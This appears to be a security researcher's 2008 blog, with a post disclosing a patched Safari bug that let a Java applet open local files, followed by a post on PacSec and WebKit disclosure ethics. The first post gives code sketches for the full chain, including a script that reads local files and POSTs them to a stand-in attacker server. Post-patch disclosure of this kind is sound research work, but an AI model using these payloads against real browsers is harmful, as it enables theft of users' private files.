Apple recently patched a vulnerability Nitesh "Leisure Suit" Dhanjani and I reported to them last week (CVE-2008-4216). We had reported a similar vulnerability to Apple about two months ago (CVE-2008-3638). In fact, the exploitation technique was so similar that we held off on releasing details until this second patch was released.
The gist of this vulnerability is that it pits a browser and a browser plug-in against each other to cross a subtle but important boundary. The issue starts simply enough: a victim visits an attacker's webpage, which loads a Java applet. Inside the applet is a call to getAppletContext().showDocument(URL);
getAppletContext().showDocument(URL) has the browser open a new browser window pointed at the URL passed to showDocument(). Normally, browsers will not let remote sites open new windows that point to local files. It seemed that Safari had some issues determining the specific "rights" of windows opened via Java applets, and it allowed getAppletContext().showDocument() to force the browser to open a file from the user's local file system.
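To make that concrete, here's a minimal sketch of the kind of applet involved (the class name and target path are my placeholders, not taken from the actual exploit):

```java
import java.applet.Applet;
import java.net.MalformedURLException;
import java.net.URL;

// Minimal sketch of the hostile applet (class name and target path are
// hypothetical). On vulnerable Safari builds, showDocument() with a
// file:// URL opened the local file in a new browser window.
public class ShowDocumentPoC extends Applet {
    public void init() {
        try {
            // Point the new window at a file in a predictable local
            // location (more on planting that file below).
            URL target = new URL("file:///C:/temp/planted.html");
            getAppletContext().showDocument(target, "_blank");
        } catch (MalformedURLException e) {
            e.printStackTrace();
        }
    }
}
```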
Now here is where things get interesting… Opening a local file in the browser isn't very useful unless we can open and render/execute content that we control. There are a couple of ways to plant our content in a predictable location using Safari. Safari, by default, caches temporary files in a reasonably predictable location. We can use these predictable locations to load our content; we'll have some guessing to do, but it works… Safari can also be forced to dump user-controlled content to the "c:\temp" directory (in Windows, of course), which makes things far more predictable and the attack a lot less noisy. I'm not sure if Apple considers the "c:\temp" issue a bug, but just in case they do, I won't go over the details of the "c:\temp" trick just yet.
In case you're wondering, Internet Explorer and Firefox use a random, eight-character directory name to prevent guessing of temporary file locations.
Once we've planted our content in a predictable location, it's simply a matter of having the Java applet call the file we've planted. We have unlimited guesses to get the location and file name right, but the more guesses we make, the noisier the attack (obviously). The file we've planted is an HTML file which loads an XMLHTTP object, which is used to steal files from the local file system. You can include a <script src="http://attacker-server/remote-control.js"></script> if you want to remotely control the script running on the local file system. Safari allows script to be executed from local files without warning, so once we get the right location and filename for our planted HTML file, files can be stolen off the local file system without user interaction or warnings.
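Here's a hedged sketch of what the planted HTML file might look like (the filename, target path, and remote-control URL are placeholders):

```html
<!-- planted.html: hedged sketch of the planted file. Loaded from a
     file:// URL, Safari ran this script without any warning. -->
<html>
<body>
<script src="http://attacker-server/remote-control.js"></script>
<script>
// Read an arbitrary local file via XMLHttpRequest. From a file://
// page, a synchronous GET for another local file succeeded on
// vulnerable Safari builds.
function stealFile(path) {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "file:///" + path, false); // false = synchronous
  xhr.send(null);
  return xhr.responseText;
}
var loot = stealFile("C:/boot.ini"); // hypothetical target file
</script>
</body>
</html>
```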
Internet Explorer presents a warning before executing script from local files, and Firefox (as of Firefox 3) restricts XMLHTTP loaded from the local file system to the directory the HTML file was loaded from (and any subdirectories).
Once we have the contents of the file in JavaScript space, we simply encode the contents and POST them to our attacker web server.
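A hedged sketch of that last step (the attacker URL and form field name are placeholders; in this version an ordinary cross-domain form POST supplies the encoding):

```html
<script>
// Exfiltrate the stolen contents ('loot' from the sketch above) with
// a plain cross-domain form POST, which no same-origin policy blocks.
// The form submission URL-encodes the field value for transport.
function exfiltrate(contents) {
  var form = document.createElement("form");
  form.method = "POST";
  form.action = "http://attacker-server/collect"; // hypothetical endpoint
  var field = document.createElement("input");
  field.type = "hidden";
  field.name = "loot";
  field.value = contents;
  form.appendChild(field);
  document.body.appendChild(form);
  form.submit();
}
exfiltrate(loot);
</script>
```

There you go... Stealing Files with Safari!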
Tuesday, November 18, 2008
Pwnichiwa from PacSec!
WOW, it's been a busy couple of weeks! I was in Tokyo last week for PacSec. PacSec was a great time: there were some GREAT talks, and Dragos knows how to party! I co-presented a talk entitled "Cross-Domain Leakiness: Divulging Sensitive Information and Attacking SSL Sessions" with Chris Evans from Google. I'm curious if this was the first time in history a Google Guy and a Microsoft Guy got on stage together and talked about security... Anyway, you can find the slides here:
Chris is a super smart guy and demo'd a ton of browser bugs, most of which he will eventually discuss on his blog (which you should check out). I had a chance to demo a few bugs and went over some techniques to steal Secure Cookies over SSL connections for popular sites. Now, before I get into the details of the Safari File Stealing bug that was recently patched (provided in the next post), I did want to talk a bit about WebKit.
<WARNING Non-Technical Content Follows!>
You were warned! Some friends and I have been playing around with Safari (we've got a couple of bugs in the pipeline). As everyone knows, Safari is based on the WebKit browser engine. I think WebKit is a great browser engine, and apparently so does Google, because they use it for Google Chrome. So, once I discover and report a vulnerability in Safari for Windows, Apple must also check Safari for Mac and Safari Mobile for iPhone. Additionally, "someone" should probably let Google know, as their Chrome browser also takes a dependency on WebKit. Now, who is this "someone"? Is it the researcher? Is it Apple? Does the researcher have a responsibility to check that this vulnerability doesn't affect Chrome? Does Apple have a responsibility to give Google the details of a vulnerability reported to them? Our situation works today because we've got great people working for Apple and Google (like Aaron and Chris) who have the means to cooperate and work for the greater good. However, as security moves higher and higher on the marketing scorecards and becomes more and more of a "competitive advantage", at what point will goodwill stop and business sense take over?
Let's contemplate a scenario that isn't so black and white… Let's say two vendors both take a dependency on WebKit. An issue is discovered, but the differences between the two browsers mean that the implementation of the fix is different. Vendor A has a patch ready to go; Vendor B, on the other hand, has a more extensive problem and needs a few more days/weeks/months. Should Vendor A wait for Vendor B to complete their patch process before protecting their own customers and pushing patches for their own products?
Let's flip the scenario… Let's say Vendor A has a vulnerability reported to them. Vendor A determines that the issue is actually in WebKit. Vendor A contacts Vendor B and discovers that Vendor B isn't affected… does this mean Vendor B knew about the issue, fixed it, and didn't tell Vendor A? Do they have a responsibility to?